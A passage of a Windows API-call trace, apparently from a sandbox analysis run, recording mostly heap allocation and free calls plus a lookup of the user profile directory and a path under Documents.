dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.157] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.157] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.158] FreeLibrary (hLibModule=0x74d40000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.158] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.159] CloseHandle (hObject=0x294) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0263.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.165] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0263.165] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.166] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0263.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Kji1x-v4FT0kOOxbY6", nBufferLength=0x104, lpBuffer=0x8bee20, 